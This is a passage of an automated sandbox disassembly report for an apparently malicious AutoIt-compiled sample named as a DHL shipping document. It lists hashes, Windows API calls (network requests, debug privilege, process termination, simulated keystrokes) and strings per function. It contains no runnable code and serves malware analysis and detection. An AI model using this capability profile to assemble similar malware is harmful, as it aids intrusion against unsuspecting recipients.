                                                                                      • Opcode ID: 3727e63459e70f40f2e117b69d90715d6993eaac9cc780b8033f292d3538d615
                                                                                      • Instruction ID: 7915f589e115829c6f4b21b709acd837178aa7be736265f4c60f550b3fd89436
                                                                                      • Opcode Fuzzy Hash: 3727e63459e70f40f2e117b69d90715d6993eaac9cc780b8033f292d3538d615
                                                                                      • Instruction Fuzzy Hash: C4518AB2800219BADF15EBA0DC52EEEBB79EF05340F145165F115721A2EB306AD9DFB0
                                                                                      APIs
                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E1C272
                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E1C29A
                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E1C2CA
                                                                                      • GetLastError.KERNEL32 ref: 00E1C322
                                                                                      • SetEvent.KERNEL32(?), ref: 00E1C336
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00E1C341
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                      • String ID:
                                                                                      • API String ID: 3113390036-3916222277
                                                                                      • Opcode ID: be1509ffdd521b4dc5c193deb212e7effc0a99b5cab733efc3fb0ea1f40d22f9
                                                                                      • Instruction ID: 73c7ad24ec28094730f19a700288fd25185867e0d46e7a6eedd50bae4a77e051
                                                                                      • Opcode Fuzzy Hash: be1509ffdd521b4dc5c193deb212e7effc0a99b5cab733efc3fb0ea1f40d22f9
                                                                                      • Instruction Fuzzy Hash: 263180B1640608AFD7219F65CC88AEB7BFCEB49744F20951EF456F2210DB30DD899B61
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00DE3AAF,?,?,Bad directive syntax error,00E3CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00E098BC
                                                                                      • LoadStringW.USER32(00000000,?,00DE3AAF,?), ref: 00E098C3
                                                                                        • Part of subcall function 00DA9CB3: _wcslen.LIBCMT ref: 00DA9CBD
                                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00E09987
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleLoadMessageModuleString_wcslen
                                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                      • API String ID: 858772685-4153970271
                                                                                      • Opcode ID: 1a760648bee5ea498c83c4d58fcca54e56ee2026e91748f2240b396e1ab6453c
                                                                                      • Instruction ID: cc47ce6f85bf3d1b0a0bef9f924dfa0b175a83870eecfa0ecc775f952e7fc6b8
                                                                                      • Opcode Fuzzy Hash: 1a760648bee5ea498c83c4d58fcca54e56ee2026e91748f2240b396e1ab6453c
                                                                                      • Instruction Fuzzy Hash: 28218D3284021EABCF11AF90CC0AEEE7B75FF19344F045469F515720A2EB719A68DB70
                                                                                      APIs
                                                                                      • GetParent.USER32 ref: 00E020AB
                                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00E020C0
                                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E0214D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameParentSend
                                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                      • API String ID: 1290815626-3381328864
                                                                                      • Opcode ID: 270b455686ae7a9b61852cf20a48ab65c7ca78f9390b0d2a69f7042b98e2a279
                                                                                      • Instruction ID: 6c311b9f46fe69ebbcdc4b425371c434baf92420abff1b0d1f085019d410a1c6
                                                                                      • Opcode Fuzzy Hash: 270b455686ae7a9b61852cf20a48ab65c7ca78f9390b0d2a69f7042b98e2a279
                                                                                      • Instruction Fuzzy Hash: A31106776C8707B9FA152620EC0FDE677DCCB15768F20211EFB04F50D1EA61A8865624
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 210dbc031cd16fcb1bae53da73e7d01d639e3fe3a8a84eeb9b2000edd95f90fa
                                                                                      • Instruction ID: 0125b20b0c57e27bb6fad9226db9954d59e069cbac96c5b6abb11a91140ea2d4
                                                                                      • Opcode Fuzzy Hash: 210dbc031cd16fcb1bae53da73e7d01d639e3fe3a8a84eeb9b2000edd95f90fa
                                                                                      • Instruction Fuzzy Hash: 46C1E074A0434AAFDF22DFA8D851BBDBBB1AF09310F18409AF458A7392C7319941DB71
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                      • String ID:
                                                                                      • API String ID: 1282221369-0
                                                                                      • Opcode ID: 06404804e4eb3a101c1bfc354f37aec923c0446dd6dbeb3d510bdab413208202
                                                                                      • Instruction ID: ddbbebcb80e076b610a397e633c75eb3f2f9e66f86489ac2fdc51b5f983ef0be
                                                                                      • Opcode Fuzzy Hash: 06404804e4eb3a101c1bfc354f37aec923c0446dd6dbeb3d510bdab413208202
                                                                                      • Instruction Fuzzy Hash: F46103B1905302AFDF21AFB49C85AB97BAAEF45320F08416FF944A7381E7319945D7B0
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00E35186
                                                                                      • ShowWindow.USER32(?,00000000), ref: 00E351C7
                                                                                      • ShowWindow.USER32(?,00000005,?,00000000), ref: 00E351CD
                                                                                      • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00E351D1
                                                                                        • Part of subcall function 00E36FBA: DeleteObject.GDI32(00000000), ref: 00E36FE6
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E3520D
                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E3521A
                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00E3524D
                                                                                      • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00E35287
                                                                                      • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00E35296
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                      • String ID:
                                                                                      • API String ID: 3210457359-0
                                                                                      • Opcode ID: 7ffb33acba5d5661ebbfe6183c761c1d6d807589128eef83013fa34b75b7e216
                                                                                      • Instruction ID: 3c9df636e345007ec1a52bad583dfc06bdf3de85da35d4e51c39fefcc034488d
                                                                                      • Opcode Fuzzy Hash: 7ffb33acba5d5661ebbfe6183c761c1d6d807589128eef83013fa34b75b7e216
                                                                                      • Instruction Fuzzy Hash: B451BD32A41A08BEEF209F25CC4EBD93FB5EB05324F246402FA15B63E0C771A984DB51
                                                                                      APIs
                                                                                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00DF6890
                                                                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00DF68A9
                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00DF68B9
                                                                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00DF68D1
                                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00DF68F2
                                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00DB8874,00000000,00000000,00000000,000000FF,00000000), ref: 00DF6901
                                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00DF691E
                                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00DB8874,00000000,00000000,00000000,000000FF,00000000), ref: 00DF692D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 1268354404-0
                                                                                      • Opcode ID: 9b76a02e32e5a3ac678312a63ea19fd4533a319099340fad426f3372e2ccacb8
                                                                                      • Instruction ID: d575935d8979c396b075438c4ca4f161a62101ae793cc4d6d4d9ae6b81479167
                                                                                      • Opcode Fuzzy Hash: 9b76a02e32e5a3ac678312a63ea19fd4533a319099340fad426f3372e2ccacb8
                                                                                      • Instruction Fuzzy Hash: B1516C70600209EFDB20CF25CC55FAA7BB9FB58750F148518FA56A72A0DB70E991EB60
                                                                                      APIs
                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E1C182
                                                                                      • GetLastError.KERNEL32 ref: 00E1C195
                                                                                      • SetEvent.KERNEL32(?), ref: 00E1C1A9
                                                                                        • Part of subcall function 00E1C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E1C272
                                                                                        • Part of subcall function 00E1C253: GetLastError.KERNEL32 ref: 00E1C322
                                                                                        • Part of subcall function 00E1C253: SetEvent.KERNEL32(?), ref: 00E1C336
                                                                                        • Part of subcall function 00E1C253: InternetCloseHandle.WININET(00000000), ref: 00E1C341
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                      • String ID:
                                                                                      • API String ID: 337547030-0
                                                                                      • Opcode ID: aaac44cb059337eeadb34e89e9327836ab8c3d1750cac7d98f76c6068f5e44aa
                                                                                      • Instruction ID: 1c7c7e9f9076e6c3a08355bba1f72d166f5a9b7ad247ad9efe979ab39dd4b845
                                                                                      • Opcode Fuzzy Hash: aaac44cb059337eeadb34e89e9327836ab8c3d1750cac7d98f76c6068f5e44aa
                                                                                      • Instruction Fuzzy Hash: 7F317E71280A05AFDB219FA5DC48AEABBF9FF18304B20541EF956E2620D730E855DB60
                                                                                      APIs
                                                                                        • Part of subcall function 00E03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E03A57
                                                                                        • Part of subcall function 00E03A3D: GetCurrentThreadId.KERNEL32 ref: 00E03A5E
                                                                                        • Part of subcall function 00E03A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E025B3), ref: 00E03A65
                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E025BD
                                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00E025DB
                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00E025DF
                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E025E9
                                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E02601
                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00E02605
                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E0260F
                                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00E02623
                                                                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00E02627
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2014098862-0
                                                                                      • Opcode ID: 19205597a83e9651ada4dba760264875393a0aebc8bfe8ac3c8080fadc779f8e
                                                                                      • Instruction ID: 2040544ab63da1d0a188cc1b5c8de51c22c6a4331df707ae6ec98ce1f7470edf
                                                                                      • Opcode Fuzzy Hash: 19205597a83e9651ada4dba760264875393a0aebc8bfe8ac3c8080fadc779f8e
                                                                                      • Instruction Fuzzy Hash: 0701D431390214BBFB1067699C8EF597FA9DB4EB12F201005F318BE0D1C9E264889A6A
                                                                                      APIs
                                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00E01449,?,?,00000000), ref: 00E0180C
                                                                                      • HeapAlloc.KERNEL32(00000000,?,00E01449,?,?,00000000), ref: 00E01813
                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E01449,?,?,00000000), ref: 00E01828
                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00E01449,?,?,00000000), ref: 00E01830
                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00E01449,?,?,00000000), ref: 00E01833
                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E01449,?,?,00000000), ref: 00E01843
                                                                                      • GetCurrentProcess.KERNEL32(00E01449,00000000,?,00E01449,?,?,00000000), ref: 00E0184B
                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00E01449,?,?,00000000), ref: 00E0184E
                                                                                      • CreateThread.KERNEL32(00000000,00000000,00E01874,00000000,00000000,00000000), ref: 00E01868
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                      • String ID:
                                                                                      • API String ID: 1957940570-0
                                                                                      • Opcode ID: 4c85986f7be295eb9c9139289a6acdeea317e4a44b0fba010b90605749ec2c1a
                                                                                      • Instruction ID: 9a8169e49de7c3ae770dcc15399e46112575489a15a306e845ebe381fe7b828d
                                                                                      • Opcode Fuzzy Hash: 4c85986f7be295eb9c9139289a6acdeea317e4a44b0fba010b90605749ec2c1a
                                                                                      • Instruction Fuzzy Hash: 7501BF75241308BFE710AB65DC4DF573F6CEB89B11F114451FA05EB192C671D814DB20
                                                                                      APIs
                                                                                        • Part of subcall function 00E0D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00E0D501
                                                                                        • Part of subcall function 00E0D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00E0D50F
                                                                                        • Part of subcall function 00E0D4DC: CloseHandle.KERNEL32(00000000), ref: 00E0D5DC
                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E2A16D
                                                                                      • GetLastError.KERNEL32 ref: 00E2A180
                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E2A1B3
                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E2A268
                                                                                      • GetLastError.KERNEL32(00000000), ref: 00E2A273
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00E2A2C4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                      • String ID: SeDebugPrivilege
                                                                                      • API String ID: 2533919879-2896544425
                                                                                      • Opcode ID: 62ec9fdb7d67b5f8d29ec665f302d25b54368c09160fa5d98ea638fdf74e0d45
                                                                                      • Instruction ID: 29492d912e6a66de79d85e4161df3ef2420968d60fe63317cf1474883a3ddf50
                                                                                      • Opcode Fuzzy Hash: 62ec9fdb7d67b5f8d29ec665f302d25b54368c09160fa5d98ea638fdf74e0d45
                                                                                      • Instruction Fuzzy Hash: AB61D071205212DFD720DF14D894F15BBE1AF44318F18849CE466AB7A3C772EC49CBA2
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00E33925
                                                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00E3393A
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00E33954
                                                                                      • _wcslen.LIBCMT ref: 00E33999
                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00E339C6
                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00E339F4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window_wcslen
                                                                                      • String ID: SysListView32
                                                                                      • API String ID: 2147712094-78025650
                                                                                      • Opcode ID: 8eb2cdb70792f95b41c9c678ec6cfa4c81d2ac2c30b83ce332fef45751cc07db
                                                                                      • Instruction ID: bb19e9ae49a41c8656e466627e61f461f287fcc72ca64dca7590d66034ba746b
                                                                                      • Opcode Fuzzy Hash: 8eb2cdb70792f95b41c9c678ec6cfa4c81d2ac2c30b83ce332fef45751cc07db
                                                                                      • Instruction Fuzzy Hash: 1341B171A00319ABEB219F64CC49FEA7BA9EF48354F10152AF948F7281D771DE84CB90
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E0BCFD
                                                                                      • IsMenu.USER32(00000000), ref: 00E0BD1D
                                                                                      • CreatePopupMenu.USER32 ref: 00E0BD53
                                                                                      • GetMenuItemCount.USER32(00FC5D10), ref: 00E0BDA4
                                                                                      • InsertMenuItemW.USER32(00FC5D10,?,00000001,00000030), ref: 00E0BDCC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                      • String ID: 0$2
                                                                                      • API String ID: 93392585-3793063076
                                                                                      • Opcode ID: c594dbdcb24aa90f9499dd43f333286c7d812fdc4f76ffda9694e220aff569cd
                                                                                      • Instruction ID: 9eda98e87766858a4aab6502a54e75bb4272c4739dd1bb872b64696b9809614e
                                                                                      • Opcode Fuzzy Hash: c594dbdcb24aa90f9499dd43f333286c7d812fdc4f76ffda9694e220aff569cd
                                                                                      • Instruction Fuzzy Hash: 85519C70A0020AABDB10DFA9D888BAEFBF4BF45318F249219E451F72D1D7709985CB61
                                                                                      APIs
                                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00E0C913
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconLoad
                                                                                      • String ID: blank$info$question$stop$warning
                                                                                      • API String ID: 2457776203-404129466
                                                                                      • Opcode ID: cbd5fd70dec44252c62d9f35cbca2d9e04de67547f078a375e78eec4b2a2682b
                                                                                      • Instruction ID: 9dd619e55e4f9c4e2694eecff65faad87d464c875e212d375364f64452a7d9d5
